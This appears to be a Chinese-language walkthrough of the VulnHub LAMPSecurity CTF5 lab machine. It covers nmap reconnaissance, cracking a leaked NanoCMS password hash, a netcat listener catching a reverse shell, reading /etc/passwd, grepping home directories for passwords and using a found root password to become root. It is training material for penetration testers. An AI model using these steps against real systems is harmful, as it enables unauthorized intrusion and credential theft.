CTF5
下载地址:https://download.vulnhub.com/lampsecurity/ctf5.zip
1、主机发现
sudo nmap -sn 192.168.239.0/24
[sudo] de1te 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-04 11:17 CST
Nmap scan report for 192.168.239.1
Host is up (0.00053s latency).
MAC Address: 00:50:56:C0:00:03 (VMware)
Nmap scan report for 192.168.239.136
Host is up (0.00015s latency).
MAC Address: 00:0C:29:6E:D6:7F (VMware)
Nmap scan report for 192.168.239.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:E5:A0:93 (VMware)
Nmap scan report for 192.168.239.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 18.92 seconds
- 靶机地址是136
2、端口扫描
-
开放端口扫描
sudo nmap -min-rate 10000 -p- 192.168.239.136 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-04 11:18 CST Nmap scan report for 192.168.239.136 Host is up (0.00065s latency). Not shown: 65524 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 139/tcp open netbios-ssn 143/tcp open imap 445/tcp open microsoft-ds 901/tcp open samba-swat 3306/tcp open mysql 53344/tcp open unknown MAC Address: 00:0C:29:6E:D6:7F (VMware) Nmap done: 1 IP address (1 host up) scanned in 14.54 seconds -
查看开放端口的服务与协议
sudo nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,53344 192.168.239.136 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-04 14:14 CST Nmap scan report for 192.168.239.136 Host is up (0.00047s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7 (protocol 2.0) 25/tcp open smtp? 80/tcp open http Apache httpd 2.2.6 ((Fedora)) 110/tcp open pop3 ipop3d 2006k.101 111/tcp open rpcbind 2-4 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP) 143/tcp open imap University of Washington IMAP imapd 2006k.396 (time zone: -0400) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP) 901/tcp open http Samba SWAT administration server 3306/tcp open mysql MySQL 5.0.45 53344/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:6E:D6:7F (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.30 Network Distance: 1 hop Service Info: Host: 192.168.239.136 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 175.52 seconds -
扫描漏洞
sudo nmap -script=vuln -p22,25,80,110,111,139,143,445,901,3306,53344 192.168.239.136 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-04 14:19 CST Nmap scan report for 192.168.239.136 Host is up (0.00021s latency). PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-enum: | /info.php: Possible information file | /phpmyadmin/: phpMyAdmin | /squirrelmail/src/login.php: squirrelmail version 1.4.11-1.fc8 | /squirrelmail/images/sm_logo.png: SquirrelMail | /icons/: Potentially interesting folder w/ directory listing |_ /inc/: Potentially interesting folder |_http-trace: TRACE is enabled |_http-csrf: Couldn't find any CSRF vulnerabilities. 110/tcp open pop3 111/tcp open rpcbind 139/tcp open netbios-ssn 143/tcp open imap 445/tcp open microsoft-ds 901/tcp open samba-swat 3306/tcp open mysql 53344/tcp open unknown MAC Address: 00:0C:29:6E:D6:7F (VMware) Host script results: |_smb-vuln-ms10-061: false |_smb-vuln-ms10-054: false |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug) Nmap done: 1 IP address (1 host up) scanned in 473.91 seconds- 没啥关键信息
3、web渗透
-
浏览网页,尝试渗透
有page参数,看看是不是文件包含
感觉是做了限制!!!看一下其他地方吧
出现了一个CMS,去serachploit 看一下有没有可以利用的漏洞
searchsploit nanocms ---------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------- --------------------------------- NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50997.py ---------------------------------------------------------------------- --------------------------------- Shellcodes: No ResultsAuthenticated看来是需要认证之后才能使用
Google hack一下,看看有没有NanoCMS的exploit
上面说这个文件存在密码哈希信息泄露漏洞
试一下:
果然,解密一下
9d2f75377ac0ab991d40c91fd27e52fd:shannon在cms的login.php尝试登陆一下
成功,看看有没有利用的地方
这个地方好像可以写
访问内容,并开启监听
sudo nc -lvnp 443 │Thanks to Jonathan Angliss and the SquirrelMail team for a prompt resolution to this vulnerability. In r [sudo] de1te 的密码: │egards to the updated files listening on [any] 443 ... │ connect to [192.168.239.129] from (UNKNOWN) [192.168.239.136] 51047 │http://www.squirrelmail.org/download.php bash: no job control in this shell │ bash-3.2$
4、提权
bash-3.2$ whoami
apache
bash-3.2$ sudo -l
sudo: sorry, you must have a tty to run sudo
bash-3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
# shadow也看不了
bash-3.2$ cat /etc/shadow
cat: /etc/shadow: Permission denied
- 权限很低,但是它用户很多。看看有没有敏感文件泄露
grep -f /home "pass" 2>/dev/null -i
在/home目录下搜索带有pass的所有文件
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
- 这个地方可能存在问题
bash-3.2$ cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
<title>Root password</title>
<text xml:space="preserve"><note-content version="0.1">Root password
Root password
50$cent</note-content></text>
<last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
<create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
<cursor-position>15</cursor-position>
<width>450</width>
<height>360</height>
<x>0</x>
<y>0</y>
<open-on-startup>False</open-on-startup>
密码50$cent,提权
bash-3.2$ python -c "import pty;pty.spawn('/bin/sh')"
sh-3.2$ su -
su -
Password: 50$cent
[root@localhost ~]#
定妆照:
[root@localhost ~]# whoami
whoami
root
[root@localhost ~]# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:httpd_t:s0
[root@localhost ~]# sudo -l
sudo -l
User root may run the following commands on this host:
(ALL) ALL